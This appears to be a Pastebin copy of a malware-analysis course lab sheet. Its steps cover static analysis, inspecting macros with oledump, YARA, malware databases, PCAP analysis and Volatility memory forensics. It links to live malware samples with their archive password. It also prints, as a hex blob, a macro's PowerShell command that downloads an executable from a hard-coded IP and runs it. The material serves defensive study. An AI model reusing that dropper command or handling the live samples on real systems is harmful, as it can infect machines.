SHARE
TWEET

Untitled

djtroby May 31st, 2017 45 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ############################
  2. # Download the Analysis VM #
  3. ############################
  4. https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip
  5. user: infosecaddicts
  6. pass: infosecaddicts
  7.  
  8.  
  9.  
  10.  
  11. - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
  12.  
  13. - After logging please open a terminal window and type the following commands:
  14.  
  15. cd Desktop/
  16.  
  17.  
  18. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  19.  
  20.  
  21. cd /home/infosecaddicts/Desktop/
  22. wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate
  23. wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate
  24.  
  25. unzip malware-password-is-infected.zip
  26.     infected
  27.  
  28. file malware.exe
  29.  
  30. mv malware.exe malware.pdf
  31.  
  32. file malware.pdf
  33.  
  34. mv malware.pdf malware.exe
  35.  
  36. hexdump -n 2 -C malware.exe
  37.  
  38. ***What is '4d 5a' or 'MZ'***
  39. Reference:
  40. http://www.garykessler.net/library/file_sigs.html
  41.  
  42.  
  43. objdump -x malware.exe
  44.  
  45. strings malware.exe
  46.  
  47. strings --all malware.exe | head -n 6
  48.  
  49. strings malware.exe | grep -i dll
  50.  
  51. strings malware.exe | grep -i library
  52.  
  53. strings malware.exe | grep -i reg
  54.  
  55. strings malware.exe | grep -i hkey
  56.  
  57. strings malware.exe | grep -i hku
  58.  
  59.                             - We didn't see anything like HKLM, HKCU or other registry type stuff
  60.  
  61. strings malware.exe | grep -i irc
  62.  
  63. strings malware.exe | grep -i join         
  64.  
  65. strings malware.exe | grep -i admin
  66.  
  67. strings malware.exe | grep -i list
  68.  
  69.  
  70.                             - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  71.  
  72. sudo apt-get install -y python-pefile
  73.      malware
  74.  
  75. vi analyse_malware.py
  76.  
  77. python analyse_malware.py malware.exe
  78.  
  79.  
  80.  
  81.  
  82. Building a Malware Scanner
  83. --------------------------
  84.  
  85. mkdir ~/Desktop/malwarescanner
  86.  
  87. cd ~/Desktop/malwarescanner
  88.  
  89. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  90.  
  91. unzip master.zip
  92.  
  93. cd malwarescanner-master/
  94.  
  95. python scanner.py -h
  96.  
  97. cat strings.txt
  98.  
  99. cat hashes.txt
  100.  
  101. mkdir ~/Desktop/malcode
  102.  
  103. cp ~/Desktop/malware.exe ~/Desktop/malcode
  104.  
  105. python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
  106.  
  107. cd ~/Desktop/
  108.  
  109.  
  110.  
  111. #####################################################
  112. # Analyzing Macro Embedded Malware                  #
  113. # Reference:                                        #
  114. # https://jon.glass/analyzes-dridex-malware-p1/     #
  115. #####################################################
  116. cp ~/Desktop/
  117.  
  118. - Create a FREE account on:
  119. https://malwr.com/account/signup/
  120.  
  121. - Grab the malware from:
  122. https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
  123.  
  124. file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  125.  
  126. cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
  127.  
  128.  
  129.  
  130.  
  131. sudo pip install olefile
  132.      malware
  133.  
  134. mkdir ~/Desktop/oledump
  135.  
  136. cd ~/Desktop/oledump
  137.  
  138. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  139.  
  140. unzip oledump_V0_0_22.zip
  141.  
  142. cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
  143.  
  144. mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
  145.  
  146.  
  147. -----------------------------------------------------------------------------------------------------------------------------------
  148.  
  149.  
  150.  
  151. sudo pip install olefile
  152.      malware
  153.  
  154. mkdir ~/Desktop/oledump
  155.  
  156. cd ~/Desktop/oledump
  157.  
  158. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
  159.  
  160. unzip 064016.zip
  161.      infected
  162.  
  163. python oledump.py 064016.doc
  164.  
  165. python oledump.py 064016.doc -s A4 -v
  166.  
  167. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  168. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  169.  
  170.  
  171. python oledump.py 064016.doc -s A5 -v
  172.  
  173. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  174.  
  175.  
  176. python oledump.py 064016.doc -s A3 -v
  177.  
  178. - Look for "GVhkjbjv" and you should see:
  179.  
  180. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  181.  
  182. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  183. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  184.  
  185.  
  186.  
  187.  
  188. ##############
  189. # Yara Ninja #
  190. ##############
  191. sudo apt-get remove -y yara
  192.      malware
  193.  
  194. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  195.  
  196. sudo apt-get -y install libtool
  197.      malware
  198.  
  199. unzip v3.4.0.zip
  200.  
  201. cd yara-3.4.0
  202.  
  203. ./bootstrap.sh
  204.  
  205. ./configure
  206.  
  207. make
  208.  
  209. sudo make install
  210.     malware
  211.  
  212. yara -v
  213.  
  214. cd ..
  215.  
  216. wget https://github.com/Yara-Rules/rules/archive/master.zip
  217.  
  218. unzip master.zip
  219.  
  220. cd ~/Desktop
  221.  
  222. yara rules-master/packer.yar malcode/malware.exe
  223.  
  224.  
  225. Places to get more Yara rules:
  226. ------------------------------
  227. https://malwareconfig.com/static/yaraRules/
  228. https://github.com/kevthehermit/YaraRules
  229. https://github.com/VectraThreatLab/reyara
  230.  
  231.  
  232.  
  233. Yara rule sorting script:
  234. -------------------------
  235. https://github.com/mkayoh/yarasorter
  236.  
  237.  
  238.  
  239. cd ~/Desktop/rules-master
  240. for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
  241. cd ~/Desktop/
  242. yara rules-master/master.yar malcode/malware.exe
  243.  
  244.  
  245.  
  246.  
  247.  
  248.  
  249.  
  250.  
  251.  
  252.  
  253. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  254. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  255.  
  256.  
  257. Malware Repositories:
  258. http://malshare.com/index.php
  259. http://www.malwareblacklist.com/
  260. http://www.virusign.com/
  261. http://virusshare.com/
  262. http://www.tekdefense.com/downloads/malware-samples/
  263.  
  264.  
  265.  
  266.  
  267. ###############################
  268. # Creating a Malware Database #
  269. ###############################
  270.  
  271. Creating a malware database (sqlite)
  272. ------------------------------------
  273. sudo apt-get install -y python-simplejson python-simplejson-dbg
  274.     malware
  275.  
  276. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  277. wget wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip
  278.  
  279. unzip malware-password-is-infected.zip
  280.     infected
  281.  
  282. python avsubmit.py --init
  283.  
  284. python avsubmit.py -f malware.exe -e
  285.  
  286.  
  287.  
  288.  
  289.  
  290. Creating a malware database (mysql)
  291. -----------------------------------
  292. - Step 1: Installing MySQL database
  293. - Run the following command in the terminal:
  294.  
  295. sudo apt-get install mysql-server
  296.      malware
  297.      
  298. - Step 2: Installing Python MySQLdb module
  299. - Run the following command in the terminal:
  300.  
  301. sudo apt-get build-dep python-mysqldb
  302.      malware
  303.  
  304. sudo apt-get install python-mysqldb
  305.      malware
  306.  
  307. Step 3: Logging in
  308. Run the following command in the terminal:
  309.  
  310. mysql -u root -p                    (set a password of 'malware')
  311.  
  312. - Then create one database by running following command:
  313.  
  314. create database malware;
  315.  
  316. exit;
  317.  
  318. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  319.  
  320. vi mal_to_db.py                     (fill in database connection information)
  321.  
  322. python mal_to_db.py -i
  323.  
  324. ------- check it to see if the files table was created ------
  325.  
  326. mysql -u root -p
  327.     malware
  328.  
  329. show databases;
  330.  
  331. use malware;
  332.  
  333. show tables;
  334.  
  335. describe files;
  336.  
  337. exit;
  338.  
  339. ---------------------------------
  340.  
  341.  
  342. - Now add the malicious file to the DB
  343.  
  344. python mal_to_db.py -f malware.exe -u
  345.  
  346.  
  347.  
  348. - Now check to see if it is in the DB
  349.  
  350. mysql -u root -p
  351.     malware
  352.  
  353. mysql> use malware;
  354.  
  355. select id,md5,sha1,sha256,time FROM files;
  356.  
  357. mysql> quit;
  358.  
  359.  
  360.  
  361.  
  362.  
  363. #################
  364. # PCAP Analysis #
  365. #################
  366. cd /home/infosecaddicts/Desktop/Browser\ Forensics
  367.  
  368. ls | grep pcap
  369.  
  370. perl chaosreader.pl suspicious-time.pcap
  371.  
  372. firefox index.html
  373.  
  374. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  375.  
  376. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  377.  
  378. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  379.      malware  
  380.  
  381.  
  382. for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u
  383.  
  384.  
  385.  
  386.  
  387.  
  388. #############################
  389. # PCAP Analysis with tshark #
  390. #############################
  391. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  392.  
  393.  
  394. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  395.  
  396.  
  397. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  398.  
  399.  
  400. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  401.  
  402.  
  403. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  404.  
  405. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  406.  
  407. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  408.  
  409. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  410.  
  411. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  412.  
  413.  
  414. whois rapidshare.com.eyu32.ru
  415.  
  416. whois sploitme.com.cn
  417.  
  418.  
  419. tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  420.  
  421. tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  422.  
  423. tshark -r suspicious-time.pcap -qz http_req,tree
  424.  
  425. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  426.  
  427. tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  428.  
  429.  
  430.  
  431. ######################################
  432. # PCAP Analysis with forensicPCAP.py #
  433. ######################################
  434. cd ~/Desktop
  435. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  436.  
  437. sudo easy_install cmd2
  438.      malware
  439.  
  440. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  441.  
  442. ForPCAP >>> help
  443.  
  444.  
  445. Prints stats about PCAP
  446. ForPCAP >>> stat
  447.  
  448.  
  449. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  450. ForPCAP >>> dns
  451.  
  452. ForPCAP >>> show
  453.  
  454.  
  455. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  456. ForPCAP >>> dstports
  457.  
  458. ForPCAP >>> show
  459.  
  460.  
  461. Prints the number of ip source and store them.
  462. ForPCAP >>> ipsrc
  463.  
  464. ForPCAP >>> show
  465.  
  466.  
  467. Prints the number of web's requests and store them
  468. ForPCAP >>> web
  469.  
  470. ForPCAP >>> show
  471.  
  472. Prints the number of mail's requests and store them
  473. ForPCAP >>> mail
  474.  
  475. ForPCAP >>> show
  476.  
  477.  
  478. ###################
  479. # Memory Analysis #
  480. ###################
  481. cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
  482.  
  483. python volatility
  484. python volatility pslist -f ../hn_forensics.vmem
  485. python volatility connscan2 -f ../hn_forensics.vmem
  486. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  487. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  488.                 ***Takes a few min***
  489. strings 1752.dmp | grep "^http://" | sort | uniq
  490. strings 1752.dmp | grep "Ahttps://" | uniq -u
  491. cd ..
  492. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  493. cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  494. cat audit.txt
  495. cd pdf
  496. ls
  497. grep -i javascript *.pdf
  498.  
  499.  
  500.  
  501. cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  502. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  503. unzip pdf-parser_V0_6_4.zip
  504. python pdf-parser.py -s javascript --raw 00600328.pdf
  505. python pdf-parser.py --object 11 00600328.pdf
  506. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  507.  
  508. cat malicious.js
  509.  
  510.  
  511. *****Sorry - no time to cover javascript de-obfuscation today*****
  512.  
  513.  
  514. cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
  515. python volatility files -f ../hn_forensics.vmem > files
  516. cat files | less
  517. python volatility malfind -f ../hn_forensics.vmem -d out
  518. ls out/
  519. python volatility hivescan -f ../hn_forensics.vmem                                 
  520. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  521. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top